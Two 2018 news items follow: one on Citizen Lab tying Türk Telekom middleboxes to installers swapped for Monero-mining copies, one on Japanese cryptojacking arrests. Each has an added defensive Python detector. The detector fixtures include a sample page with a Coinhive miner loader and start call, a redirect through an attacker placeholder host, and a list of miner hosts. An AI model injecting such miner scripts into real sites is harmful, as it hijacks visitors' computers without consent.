Monero mining malware linked to Turkish telecom company

Turkish Internet provider implicated in recent Monero mining virus epidemic in Middle East, says Citizen Lab in its report
12 March 2018

Recently there was a flood of Windows applications infected with a Monero miner in Turkey and Syria. The University of Toronto's Citizen Lab investigated the case and published a report. The results are surprising, to say the least.

The culprit was connected to Türk Telekom, a formerly state-owned Turkish telecommunications provider. According to the report, the miner is tied to an unknown party with access to the provider's middleboxes, which are associated with government surveillance in Turkey and Syria. All this raises the question of whether the virus itself is the product of some governmental mining effort.

The infection scheme, called “AdHose”, is explained further in the report. While trying to download Windows applications such as Avast Antivirus, CCleaner, 7-Zip or Opera, users are unknowingly redirected to infected copies of the legitimate software.
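The defensive counterpart to a redirect-to-tampered-installer scheme like the one described above is to treat the download as untrusted until it is checked. The Python below is an added example, not code from the article or from Citizen Lab: it takes the chain of URLs a client was taken through and the bytes it received, and flags a final host that differs from the publisher's, any cleartext HTTP hop (the only kind a network middlebox can rewrite), and a SHA-256 that does not match the digest the vendor publishes. The host name, digest and installer bytes are constructed placeholders.

```python
import hashlib
from urllib.parse import urlparse

# Constructed sample values (assumptions for this example): the host the
# vendor serves installers from, and the SHA-256 it publishes for one build.
EXPECTED_HOST = "download.example-vendor.test"
GENUINE_BODY = b"genuine installer bytes"
PUBLISHED_SHA256 = hashlib.sha256(GENUINE_BODY).hexdigest()


def check_download(redirect_chain, body, expected_host, published_sha256):
    """Return a list of findings for one download.

    redirect_chain: ordered list of URLs the client followed, first request
                    to final response.
    body:           bytes actually received for the final URL.
    An empty list means the download looks genuine.
    """
    findings = []

    # 1. The file must come from the publisher's own host, not a third party.
    final_host = urlparse(redirect_chain[-1]).hostname
    if final_host != expected_host:
        findings.append(
            f"final host {final_host!r} differs from expected {expected_host!r}"
        )

    # 2. Any cleartext hop is a point where an on-path box could have
    #    injected a redirect or swapped the payload.
    for url in redirect_chain:
        if urlparse(url).scheme != "https":
            findings.append(f"cleartext hop: {url}")

    # 3. The bytes must match the digest the vendor publishes out of band.
    digest = hashlib.sha256(body).hexdigest()
    if digest != published_sha256:
        findings.append("SHA-256 mismatch against published digest")

    return findings


# Constructed chains: a clean HTTPS download and one that was bounced over
# cleartext HTTP to an unrelated mirror serving different bytes.
GENUINE_CHAIN = ["https://download.example-vendor.test/setup.exe"]
TAMPERED_CHAIN = [
    "http://download.example-vendor.test/setup.exe",
    "http://mirror.attacker.test/setup.exe",
]
TAMPERED_BODY = b"trojanised installer bytes"

if __name__ == "__main__":
    for name, chain, body in (
        ("genuine", GENUINE_CHAIN, GENUINE_BODY),
        ("tampered", TAMPERED_CHAIN, TAMPERED_BODY),
    ):
        result = check_download(chain, body, EXPECTED_HOST, PUBLISHED_SHA256)
        print(name, "->", result or "OK")
```

The hash comparison only helps if the published digest is fetched over a channel the same middlebox cannot rewrite, which is why the check treats every non-HTTPS hop as a finding in its own right rather than relying on the digest alone.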

A Türk Telekom spokesperson responded to the accusations with a published statement calling the Citizen Lab allegations technically inaccurate and intentionally misleading. He also said that the company is currently investigating the issue, because it is “deeply committed to ethical technology development”.

The idea of government-controlled cryptocurrency mining malware is a little far-fetched in the opinion of experts, but similar cases were reported by the Open Observatory of Network Interference (OONI) in 2016. At that time an Egyptian internet provider was implicated in similar man-in-the-middle (MITM) attacks that injected malware and advertising, minus the mining element.

Report: 16 people arrested for Monero cryptojacking in Japan

Japanese hackers installed Coinhive on weakly secured websites to mine Monero, a privacy coin, which makes it harder to catch the criminals
17 June 2018

A number of high-profile websites have suffered from cryptojacking. Earlier this year, Tesla’s website was used by hackers to mine Monero with Coinhive. A bug in Drupal led to 300 sites becoming infected with Coinhive, including the websites of San Diego Zoo and the government of Chihuahua. According to the official report of the UK’s National Crime Agency (NCA), the issue is not going away in the near future:

Popular websites are likely to continue to be targets for compromise, serving cryptomining malware to visitors, and software is available that, when run in a webpage, uses the visiting computer’s spare computer processing power to mine the digital currency Monero.
National Crime Agency, the UK

The Japanese authorities have made significant progress in a cryptojacking case. Last week it was reported that Japanese police were investigating three suspects who used Coinhive to run mining scripts on many sites surreptitiously. A recent report from local publication The Asahi Shimbun says that police have now arrested 16 people, aged between 18 and 48, from 10 prefectures for cryptojacking. The suspects ran their own websites, which they allegedly used to deliver mining programs to their visitors without the users' consent.

All suspects except one had used Coinhive. The remaining person had created his own program, very similar to Coinhive, and has been detained on suspicion of creating a computer virus. Although Coinhive is free to install, it operates on a 70/30 model: only 70% of the Monero mined goes to the website operator, and the remaining 30% goes to the Coinhive developers.
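Both articles on this page come down to the same thing from a site owner's or visitor's side: a mining script loaded into a page, either as an external script from the miner's host or as an inline call that starts the miner. The Python below is an added example, not code from the article, from Coinhive or from any of the sites named: it parses an HTML document with the standard-library HTMLParser and reports script tags whose source host is on an indicator list and inline scripts that contain a miner constructor call. The host list, the inline patterns and the sample page are assumptions constructed for the example, not indicators taken from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator lists are assumptions for this example. In practice they would
# come from a maintained blocklist, not be hard-coded.
MINER_SCRIPT_HOSTS = {"coinhive.com", "coin-hive.com"}
INLINE_MINER_PATTERNS = [
    re.compile(r"CoinHive\.(Anonymous|User)\s*\(", re.IGNORECASE),
]


class MinerScanner(HTMLParser):
    """Collect findings about scripts that look like in-browser miners."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        self._script_buf = []
        src = dict(attrs).get("src")
        if src:
            # Accept absolute and scheme-relative (//host/path) sources;
            # site-relative paths yield no hostname and are skipped.
            host = urlparse(src if "//" in src else "//" + src).hostname
            if host and host.lower() in MINER_SCRIPT_HOSTS:
                self.findings.append(f"external miner script: {src}")

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            for pattern in INLINE_MINER_PATTERNS:
                if pattern.search(body):
                    self.findings.append(f"inline miner call: {pattern.pattern}")
                    break


def scan_html(html):
    """Return the list of miner-related findings for one HTML document."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: a normal site with an injected miner loader and
# an inline start call. The site key is a placeholder.
SAMPLE_PAGE = """<html><head><title>Zoo tickets</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</head><body><p>Welcome</p>
<script src="/static/app.js"></script></body></html>"""

CLEAN_PAGE = "<html><body><script src='/static/app.js'></script></body></html>"

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_PAGE), ("clean", CLEAN_PAGE)):
        print(name, "->", scan_html(page) or "no findings")
```

Run over a crawl of your own pages, a scanner like this catches the case the article describes (a miner added to a site, whether by its owner or by whoever exploited it); an obfuscated loader that builds the script URL at runtime would need a behavioural check, such as CPU use in a headless browser, which the static patterns here do not attempt.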

The individuals who had only set up Coinhive on websites they owned, not on hacked sites, were arrested nevertheless, because they had not obtained permission from their visitors to mine cryptocurrency.